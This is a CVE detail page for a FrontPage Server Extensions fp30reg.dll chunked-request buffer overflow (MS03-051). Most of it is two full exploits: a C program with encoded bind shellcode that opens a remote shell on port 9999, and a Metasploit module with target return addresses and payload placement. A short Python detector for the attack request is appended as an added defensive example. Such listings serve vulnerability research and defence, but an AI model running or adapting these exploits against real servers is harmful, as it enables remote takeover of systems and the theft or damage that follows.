CVE-2003-0822: Detail

CVE-2003-0822

EPSS: 89.14%
Attack vector: Network
Published: 2003-11-18 04:00 +00:00
Last modified: 2018-10-12 17:57 +00:00

CVE description

Buffer overflow in the debug functionality in fp30reg.dll of Microsoft FrontPage Server Extensions (FPSE) 2000 and 2002 allows remote attackers to execute arbitrary code via a crafted chunked encoded request.

CVE information

Metrics

Metric   Score   Severity   CVSS vector                   Source
V2       7.5                AV:N/AC:L/Au:N/C:P/I:P/A:P    nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the probability that a vulnerability will be exploited.

EPSS score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that the vulnerability will be exploited.

EPSS percentile

The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of all other CVEs. The percentile therefore places a CVE's EPSS score in relation to those of other CVEs.

Exploit information

Exploit Database EDB-ID: 121

Publication date: 2003-11-12 23:00 +00:00
Author: Adik
EDB verified: Yes

/*******************************************************************************
  Frontpage fp30reg.dll Overflow (MS03-051)
  discovered by Brett Moore
  Exploit by Adik  netmaniac  hotmail kg
  Binds persistent command shell on port 9999
  Tested on Windows 2000 Professional SP3 English version
  (fp30reg.dll ver 4.0.2.5526)
  -[ 13/Nov/2003 ]-
********************************************************************************/
#include <stdio.h>
#include <stdlib.h>   /* atoi, exit */
#include <string.h>
#include <io.h>       /* read/write on the console handles used by cmdshell */
#include <winsock.h>
#pragma comment(lib,"ws2_32")

#define VER "0.1"

/******** bind shellcode spawns persistent shell on port 9999 *****************************/
unsigned char kyrgyz_bind_code[] = {
    0xEB, 0x03, 0x5D, 0xEB, 0x05, 0xE8, 0xF8, 0xFF, 0xFF, 0xFF, 0x8B, 0xC5, 0x83, 0xC0, 0x11, 0x33,
    0xC9, 0x66, 0xB9, 0xC9, 0x01, 0x80, 0x30, 0x88, 0x40, 0xE2, 0xFA, 0xDD, 0x03, 0x64, 0x03, 0x7C,
    0x09, 0x64, 0x08, 0x88, 0x88, 0x88, 0x60, 0xC4, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x74, 0x77, 0xFE,
    0x74, 0xE0, 0x06, 0xC6, 0x86, 0x64, 0x60, 0xD9, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x4E, 0xE0, 0xBB,
    0xBA, 0x88, 0x88, 0xE0, 0xFF, 0xFB, 0xBA, 0xD7, 0xDC, 0x77, 0xDE, 0x4E, 0x01, 0xCE, 0x70, 0x77,
    0xFE, 0x74, 0xE0, 0x25, 0x51, 0x8D, 0x46, 0x60, 0xB8, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x5A, 0x77,
    0xFE, 0x74, 0xE0, 0xFA, 0x76, 0x3B, 0x9E, 0x60, 0xA8, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x46, 0x77,
    0xFE, 0x74, 0xE0, 0x67, 0x46, 0x68, 0xE8, 0x60, 0x98, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x42, 0x77,
    0xFE, 0x70, 0xE0, 0x43, 0x65, 0x74, 0xB3, 0x60, 0x88, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x7C, 0x77,
    0xFE, 0x70, 0xE0, 0x51, 0x81, 0x7D, 0x25, 0x60, 0x78, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x78, 0x77,
    0xFE, 0x70, 0xE0, 0x2C, 0x92, 0xF8, 0x4F, 0x60, 0x68, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x64, 0x77,
    0xFE, 0x70, 0xE0, 0x2C, 0x25, 0xA6, 0x61, 0x60, 0x58, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x60, 0x77,
    0xFE, 0x70, 0xE0, 0x6D, 0xC1, 0x0E, 0xC1, 0x60, 0x48, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x6A, 0x77,
    0xFE, 0x70, 0xE0, 0x6F, 0xF1, 0x4E, 0xF1, 0x60, 0x38, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x5E, 0xBB,
    0x77, 0x09, 0x64, 0x7C, 0x89, 0x88, 0x88, 0xDC, 0xE0, 0x89, 0x89, 0x88, 0x88, 0x77, 0xDE, 0x7C,
    0xD8, 0xD8, 0xD8, 0xD8, 0xC8, 0xD8, 0xC8, 0xD8, 0x77, 0xDE, 0x78, 0x03, 0x50, 0xDF, 0xDF, 0xE0,
    0x8A, 0x88, 0xAF, 0x87, 0x03, 0x44, 0xE2, 0x9E, 0xD9, 0xDB, 0x77, 0xDE, 0x64, 0xDF, 0xDB, 0x77,
    0xDE, 0x60, 0xBB, 0x77, 0xDF, 0xD9, 0xDB, 0x77, 0xDE, 0x6A, 0x03, 0x58, 0x01, 0xCE, 0x36, 0xE0,
    0xEB, 0xE5, 0xEC, 0x88, 0x01, 0xEE, 0x4A, 0x0B, 0x4C, 0x24, 0x05, 0xB4, 0xAC, 0xBB, 0x48, 0xBB,
    0x41, 0x08, 0x49, 0x9D, 0x23, 0x6A, 0x75, 0x4E, 0xCC, 0xAC, 0x98, 0xCC, 0x76, 0xCC, 0xAC, 0xB5,
    0x01, 0xDC, 0xAC, 0xC0, 0x01, 0xDC, 0xAC, 0xC4, 0x01, 0xDC, 0xAC, 0xD8, 0x05, 0xCC, 0xAC, 0x98,
    0xDC, 0xD8, 0xD9, 0xD9, 0xD9, 0xC9, 0xD9, 0xC1, 0xD9, 0xD9, 0x77, 0xFE, 0x4A, 0xD9, 0x77, 0xDE,
    0x46, 0x03, 0x44, 0xE2, 0x77, 0x77, 0xB9, 0x77, 0xDE, 0x5A, 0x03, 0x40, 0x77, 0xFE, 0x36, 0x77,
    0xDE, 0x5E, 0x63, 0x16, 0x77, 0xDE, 0x9C, 0xDE, 0xEC, 0x29, 0xB8, 0x88, 0x88, 0x88, 0x03, 0xC8,
    0x84, 0x03, 0xF8, 0x94, 0x25, 0x03, 0xC8, 0x80, 0xD6, 0x4A, 0x8C, 0x88, 0xDB, 0xDD, 0xDE, 0xDF,
    0x03, 0xE4, 0xAC, 0x90, 0x03, 0xCD, 0xB4, 0x03, 0xDC, 0x8D, 0xF0, 0x8B, 0x5D, 0x03, 0xC2, 0x90,
    0x03, 0xD2, 0xA8, 0x8B, 0x55, 0x6B, 0xBA, 0xC1, 0x03, 0xBC, 0x03, 0x8B, 0x7D, 0xBB, 0x77, 0x74,
    0xBB, 0x48, 0x24, 0xB2, 0x4C, 0xFC, 0x8F, 0x49, 0x47, 0x85, 0x8B, 0x70, 0x63, 0x7A, 0xB3, 0xF4,
    0xAC, 0x9C, 0xFD, 0x69, 0x03, 0xD2, 0xAC, 0x8B, 0x55, 0xEE, 0x03, 0x84, 0xC3, 0x03, 0xD2, 0x94,
    0x8B, 0x55, 0x03, 0x8C, 0x03, 0x8B, 0x4D, 0x63, 0x8A, 0xBB, 0x48, 0x03, 0x5D, 0xD7, 0xD6, 0xD5,
    0xD3, 0x4A, 0x8C, 0x88
};

void cmdshell (int sock);
long gimmeip(char *hostname);

int main(int argc,char *argv[])
{
    WSADATA wsaData;
    struct sockaddr_in targetTCP;
    struct hostent *host;
    int sockTCP,s;
    unsigned short port = 80;
    long ip;
    unsigned char header[]= "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1\r\n";
    unsigned char packet[3000],data[1500];
    unsigned char ecx[]  = "\xe0\xf3\xd4\x67";
    unsigned char edi[]  = "\xff\xd0\x90\x90";
    unsigned char call[] = "\xe4\xf3\xd4\x67";   //overwrite .data section of fp30reg.dll
    unsigned char shortjmp[] = "\xeb\x10";

    printf("\n-={ Frontpage fp30reg.dll Overflow Exploit (MS03-051) ver %s }=-\n\n"
           "  by Adik < netmaniac [at] hotmail.KG >\n\n", VER);

    if(argc < 2)
    {
        printf(" Usage: %s [Target] <port>\n"
               " eg: fp30reg.exe 192.168.63.130\n\n",argv[0]);
        return 1;
    }
    if(argc==3)
        port = atoi(argv[2]);

    WSAStartup(0x0202, &wsaData);
    printf("[*] Target:\t%s \tPort: %d\n\n",argv[1],port);
    ip=gimmeip(argv[1]);

    memset(&targetTCP, 0, sizeof(targetTCP));
    memset(packet,0,sizeof(packet));
    targetTCP.sin_family = AF_INET;
    targetTCP.sin_addr.s_addr = ip;
    targetTCP.sin_port = htons(port);

    sprintf(packet,"%sHost: %s\r\nTransfer-Encoding: chunked\r\n",header,argv[1]);

    /* NOP-filled chunk body with the overwrite values and the shellcode placed at fixed offsets */
    memset(data, 0x90, sizeof(data)-1);
    data[sizeof(data)-1] = '\x0';
    memcpy(&data[16],edi,sizeof(edi)-1);
    memcpy(&data[20],ecx,sizeof(ecx)-1);
    memcpy(&data[250+10],shortjmp,sizeof(shortjmp)-1);
    memcpy(&data[250+14],call,sizeof(call)-1);
    memcpy(&data[250+70],kyrgyz_bind_code,sizeof(kyrgyz_bind_code));

    /* append at the end of the headers already in packet (the original wrote packet into itself,
       which is undefined behaviour with overlapping buffers) */
    sprintf(packet + strlen(packet),"Content-Length: %d\r\n\r\n%x\r\n%s\r\n0\r\n\r\n",
            strlen(data),strlen(data),data);

    if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
    {
        printf("[x] Socket not initialized! Exiting...\n");
        WSACleanup();
        return 1;
    }
    printf("[*] Socket initialized...\n");

    if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
    {
        printf("[*] Connection to host failed! Exiting...\n");
        WSACleanup();
        exit(1);
    }

    printf("[*] Checking for presence of fp30reg.dll...");
    if (send(sockTCP, packet, strlen(packet),0) == -1)
    {
        printf("[x] Failed to inject packet! Exiting...\n");
        WSACleanup();
        return 1;
    }
    memset(packet,0,sizeof(packet));
    if (recv(sockTCP, packet, sizeof(packet),0) == -1)
    {
        printf("[x] Failed to receive packet! Exiting...\n");
        WSACleanup();
        return 1;
    }
    /* "HTTP/1.1 100 Continue" means the ISAPI extension accepted the chunked POST */
    if(packet[9]=='1' && packet[10]=='0' && packet[11]=='0')
        printf(" Found!\n");
    else
    {
        printf(" Not Found!! Exiting...\n");
        WSACleanup();
        return 1;
    }
    printf("[*] Packet injected!\n");
    closesocket(sockTCP);

    printf("[*] Sleeping ");
    for(s=0;s<13000;s+=1000)
    {
        printf(". ");
        Sleep(1000);
    }

    printf("\n[*] Connecting to host: %s on port 9999",argv[1]);
    if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
    {
        printf("\n[x] Socket not initialized! Exiting...\n");
        WSACleanup();
        return 1;
    }
    targetTCP.sin_family = AF_INET;
    targetTCP.sin_addr.s_addr = ip;
    targetTCP.sin_port = htons(9999);
    if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
    {
        printf("\n[x] Exploit failed or there is a Firewall! Exiting...\n");
        WSACleanup();
        exit(1);
    }
    printf("\n[*] Dropping to shell...\n\n");
    cmdshell(sockTCP);
    return 0;
}

/*********************************************************************************/
void cmdshell (int sock)
{
    struct timeval tv;
    int length;
    unsigned long o[2];   /* laid out like a Winsock fd_set: {fd_count, fd_array[0]} */
    char buffer[1000];

    tv.tv_sec = 1;
    tv.tv_usec = 0;

    while (1)
    {
        o[0] = 1;
        o[1] = sock;
        length = select (0, (fd_set *)&o, NULL, NULL, &tv);
        if(length == 1)
        {
            length = recv (sock, buffer, sizeof (buffer), 0);
            if (length <= 0)
            {
                printf ("[x] Connection closed.\n");
                WSACleanup();
                return;
            }
            length = write (1, buffer, length);
            if (length <= 0)
            {
                printf ("[x] Connection closed.\n");
                WSACleanup();
                return;
            }
        }
        else
        {
            length = read (0, buffer, sizeof (buffer));
            if (length <= 0)
            {
                printf("[x] Connection closed.\n");
                WSACleanup();
                return;
            }
            length = send(sock, buffer, length, 0);
            if (length <= 0)
            {
                printf("[x] Connection closed.\n");
                WSACleanup();
                return;
            }
        }
    }
}

/*********************************************************************************/
long gimmeip(char *hostname)
{
    struct hostent *he;
    long ipaddr;

    if ((ipaddr = inet_addr(hostname)) < 0)
    {
        if ((he = gethostbyname(hostname)) == NULL)
        {
            printf("[x] Failed to resolve host: %s! Exiting...\n\n",hostname);
            WSACleanup();
            exit(1);
        }
        memcpy(&ipaddr, he->h_addr, he->h_length);
    }
    return ipaddr;
}
/*********************************************************************************/

// milw0rm.com [2003-11-13]
Exploit Database EDB-ID: 16356

Publication date: 2010-07-24 22:00 +00:00
Author: Metasploit
EDB verified: Yes

##
# $Id: ms03_051_fp30reg_chunked.rb 9929 2010-07-25 21:37:54Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow',
			'Description'    => %q{
				This is an exploit for the chunked encoding buffer overflow
				described in MS03-051 and originally reported by Brett Moore.
				This particular module works against versions of Windows 2000
				between SP0 and SP3. Service Pack 4 fixes the issue.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9929 $',
			'References'     =>
				[
					[ 'CVE', '2003-0822'],
					[ 'OSVDB', '2952'],
					[ 'BID', '9007'],
					[ 'MSB', 'MS03-051'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows 2000 SP0-SP3',  { 'Ret' => 0x6c38a4d0 }], # from mfc42.dll
					['Windows 2000 07/22/02', { 'Ret' => 0x67d44eb1 }], # from fp30reg.dll 07/22/2002
					['Windows 2000 10/06/99', { 'Ret' => 0x67d4665d }], # from fp30reg.dll 10/06/1999
				],
			'DisclosureDate' => 'Nov 11 2003',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('URL', [ true, "The path to fp30reg.dll", "/_vti_bin/_vti_aut/fp30reg.dll" ]),
			], self.class)
	end

	def exploit
		print_status("Creating overflow request for fp30reg.dll...")

		pat = rand_text_alphanumeric(0xdead)
		pat[128, 4] = [target.ret].pack('V')
		pat[264, 4] = [target.ret].pack('V')

		# sub eax,0xfffffeff; jmp eax
		pat[160, 7] = "\x2d\xff\xfe\xff\xff" + "\xff\xe0"

		pat[280, 512] = make_nops(512)
		pat[792, payload.encoded.length] = payload.encoded

		0.upto(15) do |i|
			if (i % 3 == 0)
				print_status("Refreshing the remote dllhost.exe process...")
				res = send_request_raw({ 'uri' => datastore['URL'] }, -1)
				if (res and res.body =~ /specified module could not be found/)
					print_status("The server states that #{datastore['URL']} does not exist.\n")
					return
				end
			end

			print_status("Trying to exploit fp30reg.dll (request #{i} of 15)")
			res = send_request_raw({
				'uri'     => datastore['URL'],
				'method'  => 'POST',
				'headers' => { 'Transfer-Encoding' => 'Chunked' },
				'data'    => "DEAD\r\n#{pat}\r\n0\r\n"
			}, 5)

			if (res and res.body =~ /specified module could not be found/)
				print_status("The server states that #{datastore['URL']} does not exist.\n")
				return
			end

			handler
			select(nil,nil,nil,1)
		end
	end

	def check
		print_status("Requesting the vulnerable ISAPI path...")
		r = send_request_raw({ 'uri' => datastore['URL'] }, -1)
		if (r and r.code == 501)
			return Exploit::CheckCode::Detected
		end
		return Exploit::CheckCode::Safe
	end

end
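As an added defender-side example (not part of the CVE record or of either exploit listing above), the following Python flags the request shape both listings send: a chunked-encoded POST to the fp30reg.dll ISAPI path whose first chunk declares an oversized body. The 1 KiB threshold and the sample requests are constructed assumptions, not captured traffic.

```python
import re

FP30REG_PATH = "/_vti_bin/_vti_aut/fp30reg.dll"  # ISAPI path named in the CVE and both exploits
CHUNK_SIZE_THRESHOLD = 0x400  # assumption: 1 KiB; both exploits declare far larger first chunks


def parse_request(raw: bytes):
    """Split a raw HTTP request into (method, path, headers, body); headers keyed lowercase."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    parts = lines[0].split()
    method = parts[0].decode(errors="replace") if parts else ""
    path = parts[1].decode(errors="replace") if len(parts) > 1 else ""
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode(errors="replace")] = value.strip().decode(errors="replace")
    return method, path, headers, body


def first_chunk_size(body: bytes):
    """Declared size of the first chunk (hex chunk-size line), or None if that line is malformed."""
    m = re.match(rb"([0-9A-Fa-f]+)(?:;[^\r\n]*)?\r\n", body)
    return int(m.group(1), 16) if m else None


def is_suspicious(raw: bytes) -> bool:
    """True for a chunked POST to fp30reg.dll whose first chunk is oversized or malformed."""
    method, path, headers, body = parse_request(raw)
    if method.upper() != "POST" or path.split("?", 1)[0].lower() != FP30REG_PATH:
        return False
    if "chunked" not in headers.get("transfer-encoding", "").lower():
        return False
    size = first_chunk_size(body)
    return size is None or size >= CHUNK_SIZE_THRESHOLD


def scan(requests):
    """Return the indices of suspicious requests in a batch of raw requests."""
    return [i for i, raw in enumerate(requests) if is_suspicious(raw)]


# Constructed samples, not captured traffic. SAMPLE_EXPLOIT mirrors the shape the listings send
# (a single 0xDEAD-byte chunk); the other two are benign requests to the same path.
SAMPLE_EXPLOIT = (b"POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1\r\nHost: fpse.example\r\n"
                  b"Transfer-Encoding: Chunked\r\n\r\nDEAD\r\n" + b"A" * 0xDEAD + b"\r\n0\r\n\r\n")
SAMPLE_BENIGN_GET = b"GET /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1\r\nHost: fpse.example\r\n\r\n"
SAMPLE_BENIGN_POST = (b"POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1\r\nHost: fpse.example\r\n"
                      b"Transfer-Encoding: chunked\r\n\r\n10\r\n" + b"B" * 16 + b"\r\n0\r\n\r\n")
```

The check is a signature for the published request shape, not a general chunked-encoding parser; a small legitimate chunk to the same path passes.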

Products mentioned

Configuration 0

Microsoft>>Frontpage_server_extensions >> Version 2000

Microsoft>>Frontpage_server_extensions >> Version 2002

Microsoft>>Sharepoint_team_services >> Version 2002

Configuration 0

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_xp >> Version *

References

http://marc.info/?l=bugtraq&m=106865318904055&w=2
Tags: mailing-list, x_refsource_BUGTRAQ
http://marc.info/?l=ntbugtraq&m=106862654906759&w=2
Tags: mailing-list, x_refsource_NTBUGTRAQ
http://www.kb.cert.org/vuls/id/279156
Tags: third-party-advisory, x_refsource_CERT-VN
http://secunia.com/advisories/10195
Tags: third-party-advisory, x_refsource_SECUNIA